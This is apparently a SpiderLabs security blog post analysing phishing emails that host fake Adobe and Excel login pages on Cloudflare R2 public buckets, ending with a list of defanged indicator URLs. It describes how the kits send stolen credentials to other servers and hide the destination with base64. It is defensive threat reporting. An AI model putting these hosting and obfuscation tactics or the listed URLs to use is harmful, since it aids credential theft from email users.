Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

A Bucket of Phish: Attackers Shift Tactics with Cloudflare R2 Public Buckets

In our previous blog, we found a lot of phishing and scam URLs abusing Cloudflare services using pages.dev and workers.dev domains, respectively. We’re now seeing a lot of phishing emails with URLs abusing another Cloudflare service which is r2.dev.

 

What is Cloudflare R2?

Cloudflare R2 is a relatively new cloud storage service that allows developers to store large amounts of unstructured data without the costly egress bandwidth fees associated with typical cloud storage services.

 

Public Buckets on R2

Like in AWS S3 or other cloud storage services, Cloudflare R2 also offers public buckets which is a feature that allows users to expose the contents of their R2 buckets directly to the Internet. By default, buckets are never publicly accessible and will always require explicit user permission to enable them.

These public buckets are now being abused in a variety of phishing attacks and now widely seen in URLs used in phishing emails. The common URL structure is https://pub-{32 Hexadecimal String}.r2.dev/.

 

Phishing Emails Using Cloudflare R2 URLs

For the past 60 days, we saw more than 2,000 phishing emails containing phishing URL links abusing r2.dev service. The subjects of the phishing emails contain alarming or common keywords like statement paid, upgrade mail, purchase order, etc.

This phishing email sample mimics the Adobe Acrobat based on the From header where the email address didn’t come from a legitimate Adobe Acrobat and seems to be auto-generated. It also uses ‘Statement Paid’ in the subject to lure the victim into checking the email:

 

a-bucket-of-phish-Picture1

Figure 1. The email header of the phishing email imitating Adobe Acrobat

 a-bucket-of-phish-Picture2

Figure 1.2. The phishing email showing an approved payment

 

The clickable link hxxps://pub-5e34bcda437b499399d6abc116886480[.]r2[.]dev/indexR[.]html in the phishing email leads to a phishing site that imitates Adobe:

 a-bucket-of-phish-Picture3

Figure 2. Screenshot of the fake Adobe site

 

Looking deeper into the source-code of the phishing URL, we can see that the credentials of the victim will be posted to another phishing URL using an Ajax code format:

 

a-bucket-of-phish-Picture4Figure 2.1. The source-code containing another phishing URL with php file

 

Another phishing email sample we found contains the subject keywords ‘purchase order’ and an image attachment of a fake purchase order:

 

a-bucket-of-phish-Picture5Figure 3. The email header of the phishing email pretending to be related to a purchase order

 

a-bucket-of-phish-Picture6 

Figure 3.1. The email with PNG attachment of the fake purchase order

 

The actual PNG file attached in the phishing email has a small file size only which makes it hard to zoom in and the list of purchased items is not clear.

There’s also a phishing URL using the r2.dev domain hxxps://pub-3f02c99abcf44a4b92babb3b3c5356d6[.]r2[.]dev/index[.]html?xxx@xxxxxxx.xxx that leads to a fake Microsoft Excel spreadsheet log-in page.

 

a-bucket-of-phish-Picture7

Figure 4. The phishing site of Microsoft Excel

 

The source-code of this phishing URL uses an atob method for the base64 encoding of the redirection to the URL where the stolen credentials will be posted.

 

a-bucket-of-phish-Picture8Figure 4.1. The source-code containing base64 encoded string

 

Decoding the base64 string leads to a phishing URL abusing the SharePoint site hxxps://regionalmanagers-my[.]sharepoint[.]com/:b:/p/ivan/EVhCMbG-roNHisHIx3fXqXkBATy7wZKPXYQsdKYIS5rgWA?e=1XABKN/ which contains the name of the possible owner of the SharePoint account.

 

Cloudflare R2 Phishing URLs in VirusTotal

For the past 60 days, we also observed more than 25,000 phishing r2.dev URLs in our VirusTotal telemetry and these URLs, many of which have multiple vendor detections based on the count under the positives column.

 

a-bucket-of-phish-Picture11

Figure 5. Screenshot of the Cloudflare R2 URLs seen in VirusTotal for the last 60 days

 a-bucket-of-phish-Picture9

a-bucket-of-phish-Picture10Figure 5.1. Different Cloudflare R2 phishing URLs seen in VirusTotal

 

Conclusion

Nowadays, cloud storage services are widely used especially for file backups or maintaining a huge database. However, different cloud services are also being abused and we need to be very careful with r2.dev links seen in emails, specifically the public buckets where the URL domains start with https://pub- and ends with r2.dev as they are being used in phishing attacks. Being alert and staying updated with security news are the best way to avoid being a victim of phishing attacks and not get caught up with a bucket of phish.

Trustwave MailMarshal has protections for these phishing email campaigns, and via click-time scanning of the URLs.

 

IOCs

URLs

hxxps://pub-5e34bcda437b499399d6abc116886480[.]r2[.]dev/indexR[.]html

hxxps://samtravelsandtours[.]com/wp-content/uploads/elementor/css/app[.]php

hxxps://pub-3f02c99abcf44a4b92babb3b3c5356d6[.]r2[.]dev/index[.]html?xxx@xxxxxxx.xxx

hxxps://regionalmanagers-my[.]sharepoint[.]com/:b:/p/ivan/EVhCMbG-roNHisHIx3fXqXkBATy7wZKPXYQsdKYIS5rgWA?e=1XABKN/

hxxps://1-d0asfasfjhasfa7979352jhasf[.]pages[.]dev/

hxxps://pub-632c9814b1e848d1a7a36091da6c2082[.]r2[.]dev/index[.]html

hxxps://pub-87c999dfbd87410f8077dc99997234be[.]r2[.]dev/fiv[.]html

 

 Reference:

https://developers.cloudflare.com/r2/

https://developers.cloudflare.com/r2/buckets/public-buckets/

Latest SpiderLabs Blogs

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising

During an Advanced Continual Threat Hunt (ACTH) investigation that took place in early December 2023, Trustwave SpiderLabs discovered Ov3r_Stealer, an infostealer distributed using Facebook...

Read More